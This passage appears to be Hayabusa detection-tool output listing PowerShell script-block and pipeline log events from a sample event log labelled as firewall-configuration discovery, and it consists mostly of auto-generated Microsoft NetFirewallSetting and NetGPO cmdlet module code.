[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_method",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Parameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSetting""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Open-NetGPO""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Save-NetGPO""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetGPO"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetGPO</DefaultNoun> <StaticCmdlets> <Cmdlet> <CmdletMetadata Verb=""Open""/> <Method MethodName=""Open""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata IsMandatory=""true"" Position=""0"" PSName=""PolicyStore""/> </Parameter> <Parameter ParameterName=""DomainController""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""DomainController""/> </Parameter> <Parameter ParameterName=""GPOSession""> <Type PSType=""string""/> <CmdletOutputMetadata PSName=""GPOSession""/> </Parameter> </Parameters> </Method> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Save""/> <Method MethodName=""Save""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata IsMandatory=""true"" Position=""0"" PSName=""GPOSession""/> </Parameter> </Parameters> </Method> </Cmdlet> </StaticCmdlets> </Class> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.161 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 